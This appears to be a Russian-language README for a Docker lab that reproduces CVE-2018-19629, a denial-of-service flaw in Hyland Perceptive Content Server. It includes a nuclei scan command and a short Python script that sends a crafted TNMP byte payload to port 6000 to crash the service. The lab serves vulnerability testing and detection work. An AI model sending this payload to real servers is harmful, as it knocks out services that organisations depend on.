
Hyland Perceptive Content Server - Отказ в обслуживании
Тестовая среда Docker для CVE-2018-19629 - отказ в обслуживании сервера Hyland Perceptive Content Server.
| Поле | Значение |
|---|---|
| Идентификатор CVE | CVE-2018-19629 |
| Серьезность | Высокая (DoS) |
| Затронутые версии | Hyland Perceptive Content Server < 7.1.5 |
| Исправленная версия | 7.1.5 |
Hyland Perceptive Content Server до версии 7.1.5 содержит уязвимость отказа в обслуживании, вызванную аварийным завершением службы ImageNow Server через TCP-соединение. Злоумышленники могут нарушить работу службы, отправляя специально созданные TCP-пакеты, содержащие последовательность заголовков TNMP.
# Запустите уязвимую среду
docker-compose up -d
# Проверьте, что он слушает
# (Возможно, понадобится netcat или аналогичный инструмент)
nc -zv localhost 6000
# Тестируйте с помощью шаблона nuclei
nuclei -t ../network/cves/2018/CVE-2018-19629.yaml -u localhost:6000
Вы можете вручную вызвать сбой с помощью Python:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", 6000))
# The crafted packet
payload = b'\x54\x4e\x4d\x50\x04\x00\x00\x00\x54\x4e\x4d\x45\x00\x00\x04\x00'
s.send(payload)
s.close()
Проверьте журналы, чтобы увидеть сбой:
docker logs -f imagenow-vuln
Вы должны увидеть: [!] CRITICAL: Recevied malicious 'TNMP' packet... после чего контейнер перезапустится.
docker-compose down